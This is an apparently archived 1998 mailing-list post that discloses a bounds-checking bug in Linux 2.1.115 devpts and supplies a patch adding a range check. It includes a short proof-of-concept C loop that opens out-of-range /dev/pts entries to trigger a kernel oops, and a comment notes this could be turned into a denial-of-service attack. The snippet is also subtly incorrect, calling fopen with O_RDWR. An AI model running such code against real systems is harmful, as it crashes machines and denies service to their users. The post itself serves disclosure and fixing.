2.1.115 devpts contains a bug that can prevent you from unmounting file systems and the exploit program sticks in uninteruptable sleep until you reboot. It may be possible to trash kernel data structures using the bug with difficulty. I have yet to both ends of a pty using ptmx and devpts. I assume other version are vulnerable too. For pruposes of demonstrating the bug assume devpts is mounted on /dev/pts. My observations suggest the following program should tickle the bug: /* devpts bug tickler, hits 2.1.115 */ /* WARNING: This program enters unteruptable sleep when the kernel * oopes, so real programmers can turn this into a process table * eating DoS attack. */ int main(void) { int i,fd; char name[256]; i=257; while(1) { sprintf(name, "/dev/pts/%d", i); fd=fopen(name, O_RDWR); i++; } } The bug is a bounds chekcing failure in the root_lookup function in linux/fs/devpts/root.c. Here is a patch that fixes the bug. Given it is referencing memory it should not be viewing and the bad data is passed back to real_lookup (which promptly oopes) more spectacular effects may be possible. The only way to use a terminal running such a program again is after rebooting apparently due to the uninteruptable sleep the program that made the system call enters. --- fs/devpts/root.c.dist Thu Aug 13 17:54:17 1998 +++ fs/devpts/root.c Thu Aug 13 17:56:54 1998 @@ -159,6 +159,8 @@ entry += (*p++ - '0'); } } + if (entry>=sbi->max_ptys) /* Check range of number */ + return 0; dentry->d_inode = sbi->inodes[entry]; if ( dentry->d_inode )
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:12:33 PDT